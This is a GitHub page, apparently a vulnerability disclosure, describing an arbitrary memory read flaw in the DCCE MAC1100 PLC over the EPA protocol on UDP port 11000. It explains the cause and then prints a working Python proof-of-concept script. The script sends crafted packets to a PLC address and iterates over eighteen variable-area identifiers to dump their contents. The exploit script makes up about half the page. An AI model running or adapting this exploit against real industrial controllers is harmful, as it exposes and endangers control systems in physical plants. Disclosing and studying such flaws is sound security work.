Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Dut Computer Control Engineering Co., Ltd

Edition :

(Dut Computer Control Engineering Co., Ltd ) DCCE MAC1100 PLC

Location

Can read the contents of any variable area

Harm

Memory arbitrary read and write vulnerability Allows the attacker to read the contents of any variable area

Cause the cause

The MAC1100 PLC communicates on the 11000 port using the EPA protocol. The variable identification area of the EPA protocol represents the variable area accessed. Eighteen variable areas can be accessed through the EPA protocol, such as the I zone (input coil zone) and the Q zone (output coil zone). V area (user variable area), L area (local variable area), M area (memory variable area), SM area (special function area), and the like. We can read the contents of any variable area

We can use PLC_config to check the status of each PLC memory. The value of PLC Q area is as shown below. The Q area of the PLC is 16 points and the Q00 value is 1.

Then execute the script

poc

#!/usr/bin/python
# -*- coding:utf-8 -*-
import socket
import os
import time
import struct

def mem_leak(magic_message):
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:
        sender.sendto(magic_message,("192.168.1.181",11000))
        request = sender.recvfrom(1024)

        print request
    except:
        pass

packet_read  =       ["\x0c"]
packet_read  +=      ["\x00\x1d\x0d"]
packet_read  +=      ["\x10\x00"]
packet_read  +=      ["\x01\x00"]
packet_read  +=      ["\x00\x00"]
packet_read  +=      ["\x66\x00"]
packet_read  +=      ["\x00\x00"]
packet_read  +=      ["\x00\x00"]

for i in range(101,119):
    packet_read[5] = struct.pack("H", i)
    packet = "".join(packet_read)
    print   [hex(ord(i)) for i in packet]
    mem_leak(packet)